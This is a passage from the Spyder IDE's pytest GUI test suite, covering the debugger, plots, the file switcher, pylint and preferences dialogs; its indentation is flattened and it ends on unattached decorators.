qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Change focus to IPython console
main_window.ipyconsole.get_focus_widget().setFocus()
# Wait for the error
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out sometimes on Windows and macOS")
def test_c_and_n_pdb_commands(main_window, qtbot):
"""Test that c and n Pdb commands update the Variable Explorer."""
nsb = main_window.variableexplorer.get_focus_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
qtbot.wait(500)
# Verify that c works
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!c')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 1)
# Verify that n works
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 2)
# Verify that doesn't go to sitecustomize.py with next and stops
# the debugging session.
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 3)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
# Assert that the prompt appear
shell.clear_console()
assert 'In [2]:' in control.toPlainText()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_stop_dbg(main_window, qtbot):
"""Test that we correctly stop a debugging session."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Move to the next line
shell.pdb_execute("!n")
qtbot.wait(1000)
# Stop debugging
stop_debug_action = main_window.debug_toolbar_actions[5]
stop_debug_button = main_window.debug_toolbar.widgetForAction(stop_debug_action)
qtbot.mouseClick(stop_debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Assert there are only two ipdb prompts in the console
assert shell._control.toPlainText().count('IPdb') == 2
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It only works on Linux")
def test_change_cwd_dbg(main_window, qtbot):
"""
Test that using the Working directory toolbar is working while debugging.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Set LOCATION as cwd
main_window.workingdirectory.chdir(tempfile.gettempdir())
qtbot.wait(1000)
print(repr(control.toPlainText()))
shell.clear_console()
qtbot.wait(500)
# Get cwd in console
qtbot.keyClicks(control, 'import os; os.getcwd()')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Assert cwd is the right one
assert tempfile.gettempdir() in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or PY2, reason="It times out sometimes")
def test_varexp_magic_dbg(main_window, qtbot):
"""Test that %varexp is working while debugging."""
nsb = main_window.variableexplorer.get_focus_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Get to an object that can be plotted
for _ in range(2):
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
# Generate the plot from the Variable Explorer
nsb.editor.plot('li', 'plot')
qtbot.wait(1000)
# Assert that there's a plot in the console
assert shell._control.toHtml().count('img src') == 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2, reason="It times out sometimes")
@pytest.mark.parametrize(
'main_window',
[{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 1)},
{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 0)}],
indirect=True)
def test_plots_plugin(main_window, qtbot, tmpdir, mocker):
"""
Test that plots generated in the IPython console are properly displayed
in the plots plugin.
"""
assert CONF.get('plots', 'mute_inline_plotting') is False
shell = main_window.ipyconsole.get_current_shellwidget()
figbrowser = main_window.plots.current_widget()
# Wait until the window is fully up.
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate a plot inline.
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig = plt.plot([1, 2, 3, 4], '.')\n"))
if CONF.get('ipython_console', 'pylab/inline/figure_format') == 0:
assert figbrowser.figviewer.figcanvas.fmt == 'image/png'
else:
assert figbrowser.figviewer.figcanvas.fmt == 'image/svg+xml'
# Get the image name from the html, fetch the image from the shell, and
# save it as a png.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
ipython_figname = osp.join(to_text_string(tmpdir), 'ipython_img.png')
ipython_qimg = shell._get_image(img_name)
ipython_qimg.save(ipython_figname)
# Save the image with the Plots plugin as a png.
plots_figname = osp.join(to_text_string(tmpdir), 'plots_img.png')
mocker.patch('spyder.plugins.plots.widgets.figurebrowser.getsavefilename',
return_value=(plots_figname, '.png'))
figbrowser.save_figure()
assert compare_images(ipython_figname, plots_figname, 0.1) is None
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2, reason="It times out sometimes")
def test_tight_layout_option_for_inline_plot(main_window, qtbot, tmpdir):
"""
Test that the option to set bbox_inches to 'tight' or 'None' is
working when plotting inline in the IPython console. By default, figures
are plotted inline with bbox_inches='tight'.
"""
tmpdir = to_text_string(tmpdir)
# Assert that the default is True.
assert CONF.get('ipython_console', 'pylab/inline/bbox_inches') is True
fig_dpi = float(CONF.get('ipython_console', 'pylab/inline/resolution'))
fig_width = float(CONF.get('ipython_console', 'pylab/inline/width'))
fig_height = float(CONF.get('ipython_console', 'pylab/inline/height'))
# Wait until the window is fully up.
shell = main_window.ipyconsole.get_current_shellwidget()
client = main_window.ipyconsole.get_current_client()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_focus_widget()
control.setFocus()
# Generate a plot inline with bbox_inches=tight (since it is default) and
# save the figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_tight.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches='tight',\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_tight.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
# Change the option so that bbox_inches=None.
CONF.set('ipython_console', 'pylab/inline/bbox_inches', False)
# Restart the kernel and wait until it's up again
shell._prompt_html = None
client.restart_kernel()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate the same plot inline with bbox_inches='tight' and save the
# figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_None.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches=None,\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_None.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
def test_switcher(main_window, qtbot, tmpdir):
"""Test the use of shorten paths when necessary in the switcher."""
switcher = main_window.switcher
# Assert that the full path of a file is shown in the switcher
file_a = tmpdir.join('test_file_a.py')
file_a.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file_a))
main_window.open_switcher()
switcher_paths = [switcher.model.item(item_idx).get_description()
for item_idx in range(switcher.model.rowCount())]
assert osp.dirname(str(file_a)) in switcher_paths or len(str(file_a)) > 75
switcher.close()
# Assert that long paths are shortened in the switcher
dir_b = tmpdir
for _ in range(3):
dir_b = dir_b.mkdir(str(uuid.uuid4()))
file_b = dir_b.join('test_file_b.py')
file_b.write('bar\n')
main_window.editor.load(str(file_b))
main_window.open_switcher()
file_b_text = switcher.model.item(
switcher.model.rowCount() - 1).get_description()
assert '...' in file_b_text
switcher.close()
# Assert search works correctly
search_texts = ['test_file_a', 'file_b', 'foo_spam']
expected_paths = [file_a, file_b, None]
for search_text, expected_path in zip(search_texts, expected_paths):
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, search_text)
qtbot.wait(200)
assert switcher.count() == bool(expected_path)
switcher.close()
# Assert symbol switcher works
main_window.editor.set_current_filename(str(file_a))
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.request_symbols()
qtbot.wait(9000)
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, '@')
qtbot.wait(200)
assert switcher.count() == 2
switcher.close()
@flaky(max_runs=3)
@pytest.mark.slow
def test_edidorstack_open_switcher_dlg(main_window, tmpdir):
"""
Test that the file switcher is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file_open_switcher_dlg.py')
file.write("a test file for test_edidorstack_open_switcher_dlg")
main_window.editor.load(str(file))
# Test that the file switcher opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_switcher_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert (editorstack.switcher_dlg.count() ==
len(main_window.editor.get_filenames()))
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out too much on Windows and macOS")
def test_editorstack_open_symbolfinder_dlg(main_window, qtbot, tmpdir):
"""
Test that the symbol finder is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file.py')
file.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file))
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.request_symbols()
qtbot.wait(5000)
# Test that the symbol finder opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_symbolfinder_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert editorstack.switcher_dlg.count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
reason="Times out sometimes on macOS")
def test_run_static_code_analysis(main_window, qtbot):
"""This tests that the Pylint plugin is working as expected."""
from spyder.plugins.pylint.main_widget import PylintWidgetActions
# Select the third-party plugin
pylint_plugin = get_thirdparty_plugin(main_window, "Code Analysis")
# Do an analysis
test_file = osp.join(LOCATION, 'script_pylint.py')
main_window.editor.load(test_file)
pylint_plugin.get_action(PylintWidgetActions.RunCodeAnalysis).trigger()
qtbot.wait(3000)
# Perform the test
# Check output of the analysis
treewidget = pylint_plugin.get_widget().get_focus_widget()
qtbot.waitUntil(lambda: treewidget.results is not None,
timeout=SHELL_TIMEOUT)
result_content = treewidget.results
assert result_content['C:']
pylint_version = LooseVersion(pylint.__version__)
if pylint_version < LooseVersion('2.5.0'):
number_of_conventions = 5
else:
number_of_conventions = 3
assert len(result_content['C:']) == number_of_conventions
# Close the file
main_window.editor.close_file()
@flaky(max_runs=3)
@pytest.mark.slow
def test_troubleshooting_menu_item_and_url(main_window, qtbot, monkeypatch):
"""Test that the troubleshooting menu item calls the valid URL."""
help_plugin = main_window.help
MockQDesktopServices = Mock()
mockQDesktopServices_instance = MockQDesktopServices()
attr_to_patch = ('spyder.utils.qthelpers.QDesktopServices')
monkeypatch.setattr(attr_to_patch, MockQDesktopServices)
# Unit test of help menu item: Make sure the correct URL is called.
help_plugin.trouble_action.trigger()
assert MockQDesktopServices.openUrl.call_count == 1
mockQDesktopServices_instance.openUrl.called_once_with(__trouble_url__)
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows")
def test_help_opens_when_show_tutorial_full(main_window, qtbot):
"""
Test fix for spyder-ide/spyder#6317.
'Show tutorial' opens the help plugin if closed.
"""
HELP_STR = "Help"
help_pane_menuitem = None
for action in main_window.plugins_menu.actions():
if action.text() == HELP_STR:
help_pane_menuitem = action
break
# Test opening tutorial with Help plguin closed
main_window.help.toggle_view_action.setChecked(False)
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert help_tabbar is None and help_index is None
assert not isinstance(main_window.focusWidget(), ObjectComboBox)
assert not help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open, but not selected
help_tabbar.setCurrentIndex((help_tabbar.currentIndex() + 1)
% help_tabbar.count())
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index != help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open and the active tab
qtbot.wait(500)
main_window.help.show_tutorial()
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
qtbot.wait(500)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
@pytest.mark.slow
@flaky(max_runs=3)
def test_report_issue(main_window, qtbot):
"""Test that the report error dialog opens correctly."""
main_window.console.report_issue()
qtbot.wait(300)
assert main_window.console.get_widget()._report_dlg is not None
assert main_window.console.get_widget()._report_dlg.isVisible()
assert main_window.console.get_widget()._report_dlg.close()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
sys.platform.startswith('linux'), reason="It segfaults on Linux")
def test_custom_layouts(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
mw = main_window
mw.first_spyder_run = False
prefix = 'window' + '/'
settings = mw.load_window_settings(prefix=prefix, default=True)
# Test layout changes
for layout_idx in ['default'] + list(range(4)):
with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
layout = mw.setup_default_layouts(layout_idx, settings=settings)
with qtbot.waitSignal(None, timeout=500, raising=False):
# Add a wait to see changes
pass
widgets_layout = layout['widgets']
hidden_widgets = layout['hidden widgets']
for column in widgets_layout:
for row in column:
for idx, widget in enumerate(row):
if idx == 0:
if widget not in hidden_widgets:
print(widget) # spyder: test-skip
try:
# New API
assert widget.get_widget().isVisible()
except AttributeError:
# Old API
assert widget.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
def test_save_on_runfile(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
# Load test file
test_file = osp.join(LOCATION, 'script.py')
test_file_copy = test_file[:-3] + '_copy.py'
shutil.copyfile(test_file, test_file_copy)
main_window.editor.load(test_file_copy)
code_editor = main_window.editor.get_focus_widget()
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
qtbot.keyClicks(code_editor, 'test_var = 123', delay=100)
filename = code_editor.filename
with qtbot.waitSignal(shell.sig_prompt_ready):
shell.execute('runfile("{}")'.format(remove_backslashes(filename)))
assert shell.get_value('test_var') == 123
main_window.editor.close_file()
os.remove(test_file_copy)
@pytest.mark.slow
@pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS")
def test_pylint_follows_file(qtbot, tmpdir, main_window):
"""Test that file editor focus change updates pylint combobox filename."""
for plugin in main_window.thirdparty_plugins:
if plugin.CONF_SECTION == 'pylint':
pylint_plugin = plugin
break
# Show pylint plugin
pylint_plugin.dockwidget.show()
pylint_plugin.dockwidget.raise_()
# Create base temporary directory
basedir = tmpdir.mkdir('foo')
# Open some files
for idx in range(2):
fh = basedir.join('{}.py'.format(idx))
fname = str(fh)
fh.write('print("Hello world!")')
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Create a editor split
main_window.editor.editorsplitter.split(orientation=Qt.Vertical)
qtbot.wait(500)
# Open other files
for idx in range(4):
fh = basedir.join('{}.py'.format(idx))
fh.write('print("Hello world!")')
fname = str(fh)
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Close split panel
for editorstack in reversed(main_window.editor.editorstacks):
editorstack.close_split()
break
qtbot.wait(1000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_report_comms_error(qtbot, main_window):
"""Test if a comms error is correctly displayed."""
CONF.set('main', 'show_internal_errors', True)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a bogus get_cwd
with qtbot.waitSignal(shell.executed):
shell.execute('def get_cwd(): import foo')
with qtbot.waitSignal(shell.executed):
shell.execute("get_ipython().kernel.frontend_comm."
"register_call_handler('get_cwd', get_cwd)")
with qtbot.waitSignal(shell.executed, timeout=3000):
shell.execute('ls')
error_dialog = main_window.console.error_dialog
assert error_dialog is not None
assert 'Exception in comms call get_cwd' in error_dialog.error_traceback
assert 'No module named' in error_dialog.error_traceback
main_window.console.close_error_dialog()
CONF.set('main', 'show_internal_errors', False)
@pytest.mark.slow
@flaky(max_runs=3)
def test_break_while_running(main_window, qtbot, tmpdir):
"""Test that we can set breakpoints while running."""
# Create loop
code = ("import time\n"
"for i in range(100):\n"
" print(i)\n"
" time.sleep(0.1)\n"
)
p = tmpdir.join("loop_script.py")
p.write(code)
test_file = to_text_string(p)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Load test file
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Click the debug button
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Continue debugging
qtbot.keyClicks(shell._control, '!c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
qtbot.wait(500)
with qtbot.waitSignal(shell.executed):
# Set a breakpoint
code_editor.debugger.toogle_breakpoint(line_number=3)
# We should drop into the debugger
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(shell._control, '!q')
qtbot.keyClick(shell._control, Qt.Key_Enter)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# --- Preferences
# ----------------------------------------------------------------------------
def preferences_dialog_helper(qtbot, main_window, section):
"""
Open preferences dialog and select page with `section` (CONF_SECTION).
"""
main_window.show_preferences()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is not None,
timeout=5000)
dlg = main_window.prefs_dialog_instance
index = dlg.get_index_by_name(section)
page = dlg.get_page(index)
dlg.set_current_index(index)
return dlg, index, page
@pytest.mark.slow
def test_preferences_run_section_exists(main_window, qtbot):
"""
Test for spyder-ide/spyder#13524 regression.
Ensure the Run section exists.
"""
assert preferences_dialog_helper(qtbot, main_window, 'run')
@pytest.mark.slow
def test_preferences_checkboxes_not_checked_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#10139 regression.
Enabling codestyle/docstyle on the completion section of preferences,
was not updating correctly.
"""
# Reset config
CONF.set('lsp-server', 'pycodestyle', False)
CONF.set('lsp-server', 'pydocstyle', False)
# Open completion prefences and update options
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'lsp-server')
# Get the correct tab pages inside the Completion preferences page
tnames = [page.tabs.tabText(i).lower() for i in range(page.tabs.count())]
tab_widgets = {
tnames.index('code style and formatting'): page.code_style_check,
tnames.index('docstring style'): page.docstring_style_check,
}
for idx, check in tab_widgets.items():
page.tabs.setCurrentIndex(idx)
check.animateClick()
qtbot.wait(500)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
# Check the menus are correctly updated
count = 0
for menu_item in main_window.source_menu_actions:
if menu_item and isinstance(menu_item, QAction):
print(menu_item.text(), menu_item.isChecked())
if 'code style' in menu_item.text():
assert menu_item.isChecked()
count += 1
elif 'docstring style' in menu_item.text():
assert menu_item.isChecked()
count += 1
assert count == 2
# Reset config
CONF.set('lsp-server', 'pycodestyle', False)
CONF.set('lsp-server', 'pydocstyle', False)
@pytest.mark.slow
def test_preferences_change_font_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#10284 regression.
Changing font resulted in error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'appearance')
for fontbox in [page.plain_text_font.fontbox,
page.rich_text_font.fontbox]:
fontbox.setFocus()
idx = fontbox.currentIndex()
fontbox.setCurrentIndex(idx + 1)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
@pytest.mark.slow
@pytest.mark.skipif(
not sys.platform.startswith('linux'),
reason="Changes of Shitf+Return shortcut cause an ambiguos shortcut")
def test_preferences_empty_shortcut_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#12992 regression.
Overwritting shortcuts results in a shortcuts conflict.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Setup shortcuts (set run cell and advance shortcut to run selection)
base_run_cell_advance = CONF.get_shortcut(
'editor', 'run cell and advance') # Should be Shift+Return
base_run_selection = CONF.get_shortcut(
'editor', 'run selection') # Should be F9
assert base_run_cell_advance == 'Shift+Return'
assert base_run_selection == 'F9'
CONF.set_shortcut(
'editor', 'run cell and advance', '')
CONF.set_shortcut(
'editor', 'run selection', base_run_cell_advance)
main_window.shortcuts.apply_shortcuts()
# Check execution of shortcut
# Create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(u'print(0)\nprint(ññ)')
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(lambda: u'print(0)' in shell._control.toPlainText())
assert u'ññ' not in shell._control.toPlainText()
# Reset shortcuts
CONF.set_shortcut(
'editor', 'run selection', 'F9')
CONF.set_shortcut(
'editor', 'run cell and advance', 'Shift+Return')
main_window.shortcuts.apply_shortcuts()
qtbot.wait(500) # Wait for shortcut change to actually be applied
# Check shortcut run cell and advance reset
code_editor.setFocus()
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(lambda: 'runcell(0' in shell._control.toPlainText())
@pytest.mark.slow
def test_preferences_shortcut_reset_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#11132 regression.
Resetting shortcut resulted in error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'shortcuts')
page.reset_to_default(force=True)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
@pytest.mark.slow
def test_preferences_change_interpreter(qtbot, main_window):
"""Test that on main interpreter change signal is emitted."""
# Check original pyls configuration
lsp = main_window.completions.get_client('lsp')
config = lsp.generate_python_config()
jedi = config['configurations']['pyls']['plugins']['jedi']
assert jedi['environment'] is None
assert jedi['extra_paths'] == []
# Change main interpreter on preferences
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
page.cus_exec_radio.setChecked(True)
page.cus_exec_combo.combobox.setCurrentText(sys.executable)
with qtbot.waitSignal(main_window.sig_main_interpreter_changed,
timeout=5000, raising=True):
dlg.ok_btn.animateClick()
# Check updated pyls configuration
config = lsp.generate_python_config()
jedi = config['configurations']['pyls']['plugins']['jedi']
assert jedi['environment'] == sys.executable
assert jedi['extra_paths'] == []
@pytest.mark.slow
def test_preferences_last_page_is_loaded(qtbot, main_window):
# Test that the last page is updated on re open
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is not None,
timeout=5000)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
main_window.show_preferences()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is not None,
timeout=5000)
dlg = main_window.prefs_dialog_instance
assert dlg.get_current_index() == index
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out too much on Windows and macOS")
